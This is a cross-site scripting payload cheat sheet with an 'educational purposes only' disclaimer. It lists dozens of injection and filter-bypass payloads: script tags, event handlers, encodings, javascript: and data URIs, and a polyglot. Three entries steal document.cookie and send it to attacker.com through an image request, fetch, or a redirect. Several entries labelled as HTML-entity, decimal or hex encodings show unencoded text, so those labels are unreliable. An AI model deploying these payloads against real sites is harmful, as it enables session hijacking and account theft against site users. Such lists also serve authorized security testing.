Cross-Site Scripting payloads and filter bypass techniques.
Educational purposes only. Only test on systems you own or for which you have explicit authorization.
Basic script tag
    <script>alert(1)</script>

Show domain
    <script>alert(document.domain)</script>

Show cookies
    <script>alert(document.cookie)</script>

Image error handler
    <img src=x onerror=alert(1)>

SVG onload
    <svg onload=alert(1)>

Body onload
    <body onload=alert(1)>

Mouse over event
    <div onmouseover=alert(1)>hover me</div>

Auto focus input
    <input onfocus=alert(1) autofocus>

Marquee start
    <marquee onstart=alert(1)>

Video source error
    <video><source onerror=alert(1)>

Details toggle
    <details open ontoggle=alert(1)>

Select focus
    <select onfocus=alert(1) autofocus>

Mixed case
    <ScRiPt>alert(1)</ScRiPt>

Template literals
    <script>alert`1`</script>

Quoted attribute
    <img src=x onerror="alert(1)">

HTML entities
    <img src=x onerror=alert(1)>

No space needed
    <svg/onload=alert(1)>

Break out of attribute
    "><script>alert(1)</script>

Break out of JS string
    '-alert(1)-'

Base64 encoded
    <script>eval(atob("YWxlcnQoMSk="))</script>

Unicode escape
    <script>\u0061lert(1)</script>

HTML decimal
    <img src=x onerror=alert(1)>

HTML hex
    <img src=x onerror=alert(1)>

URL encoded
    %3Cscript%3Ealert(1)%3C/script%3E

Fragment injection
    #<script>alert(1)</script>

JavaScript protocol
    javascript:alert(1)

Data URI
    data:text/html,<script>alert(1)</script>

Anchor href
    <a href="javascript:alert(1)">click</a>

Iframe src
    <iframe src="javascript:alert(1)">

Image request
    <script>new Image().src="http://attacker.com/?c="+document.cookie</script>

Fetch API
    <script>fetch("http://attacker.com/?c="+document.cookie)</script>

Redirect with cookie
    <img src=x onerror="location='http://attacker.com/?c='+document.cookie">

Multi-context polyglot
    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//...

HTML/JS context
    "><img src=x onerror=alert(1)>//

JS string context
    '-alert(1)-'